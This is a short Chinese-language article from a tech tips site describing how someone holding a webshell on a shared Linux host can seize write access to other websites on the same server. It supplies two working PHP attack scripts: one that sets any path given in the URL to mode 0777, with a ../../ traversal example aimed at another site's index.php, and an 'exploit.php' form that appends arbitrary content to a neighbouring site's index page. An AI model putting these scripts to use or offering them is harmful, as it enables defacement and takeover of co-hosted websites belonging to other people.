知识屋:更实用的电脑技术知识网站
所在位置:首页 > 操作系统 > linux

Linux环境下用webshell对文件权限的修改

发布时间:2011-02-27 19:18:46作者:知识屋

 当我们拥有了一个linux下的shell(服务器上多个网站)。

这个shell对所在站点的根目录有可写入权限,甚至能查看其他网站的目录。

那么,这样的主机设置肯定是不安全的。

有的时候,我们想对获得同服务器的其他站的权限,比如直接对其他站点的index.php进行修改,却发现没有权限。

我们可以尝试通过以下脚本来实现对其他站点的文件添加权限。



代码:

<?php
$path = stripslashes($_GET['path']);
$ok = chmod ($path , 0777);
if ($ok == true)
echo " CHMOD OK , Permission editable file or directory. Permission to write";
?>

保存为chmod.PHP

使用方法简单,访问

http://site/chmod.php?path=../../其他站点的目录/index.php

这里的index.PHP是要修改权限的文件【6688电子商务网站 www.6688.cc 】。


另外一个exploit:

把下面的代码保存为exploit.PHP

代码:

<?php

@$filename = stripslashes($_POST['filename']);
@$mess = stripslashes($_POST['mess']); 
$fp = @fopen("{$_POST['filename']}", 'a');
@fputs($fp,"$mess <hr size="1" color="black">");
@fclose($fp);
?> 

<form name="form1" action="exploit.php" method="post">
<p align="center"><b>
<br>
CODE :<br>
<textarea name="mess" rows="3"></textarea></font></b></textarea>
</font></b> <p><input type="hidden" name="filename" value="../../AUTRE WEBSITE SUR LE MULTIHOSTING/index.php"></p>
<center>
<input type="reset" name="Submit" value="Delete">
<input name="go" type="submit" value="Send" onClick="javascript:this.style.visibility ='hidden';">
<center>
</form>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Changing CHMOD Permissions Exploit - Contact : the_gl4di4t0r[AT]hotmail[DOT]com</title>
</head>
<body>
</center>
</body>

(免责声明:文章内容如涉及作品内容、版权和其它问题,请及时与我们联系,我们将在第一时间删除内容,文章内容仅供参考)
收藏
  • 人气文章
  • 最新文章
  • 下载排行榜
  • 热门排行榜